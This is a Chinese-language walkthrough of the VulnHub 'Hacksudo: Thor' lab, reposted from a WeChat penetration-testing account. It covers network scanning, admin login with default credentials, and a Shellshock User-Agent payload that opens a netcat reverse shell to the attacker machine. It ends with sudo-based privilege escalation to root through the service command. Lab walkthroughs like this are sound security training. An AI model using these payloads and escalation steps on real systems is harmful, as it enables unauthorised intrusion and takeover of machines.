靶场下载地址:
https://download.vulnhub.com/hacksudo/hacksudo---Thor.zip信息搜集
一、Nmap进行扫描
nmap -sP 192.168.106.0/24 #对自己的靶机网段进行存活探测,获取靶机地址nmap -T4 -A -p- 192.168.106.133 #对目标进行全端口扫描
二、WEB服务探测
通过扫描发现目标开放了21、22、80端口对目标进行目录爆破查看news.php页面发现cgi-bin,说明使用了CGI技术发现存在README.md文件通过阅读README.md得知该系统源码托管在Github上https://github.com/zakee94/online-banking-system/tree/master/net-banking并且获取到了系统默认的用户密码admin password123
通过admin用户进行登录http://192.168.106.133/home.php #无法登录成功http://192.168.106.133/admin_login.php # 成功登录通过点击页面查看发现存在4个用户名,点击获取到他们的密码zakee94 nafees123'salman salman123'tushar tushar123'jon snow123'
爆破http://192.168.106.133/cgi-bin/目录下的文件,查看是否存在cgi脚本存在以下文件:/cgi-bin/backup.cgi/cgi-bin/shell.sh//cgi-bin/shell.sh对目标进行扫描,发现目标存在CVE-2014-6271、CVE-2021-42071、rce-user-agent-shell-shock漏洞使用rce-user-agent-shell-shock漏洞反弹shellUser-Agent: () { :; }; echo; echo; /bin/sh -c 'nc -e /bin/bash 192.168.106.128 4444'使用python升级shellpython3 -c 'import pty;pty.spawn("/bin/bash")'
三、提权
通过sudo -l 发现拥有thor用户的hammer.sh文件权限发现该脚本发现可以以thor用户权限执行系统命令使用bash命令切换到thor用户再次通过sudo -l查看发现thor用户拥有root用户的cat权限和service权限
使用service程序成功提权为root用户sudo service ../../bin/sh
原文始发于微信公众号(渗透笔记):HACKSUDO: THOR靶场实战
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论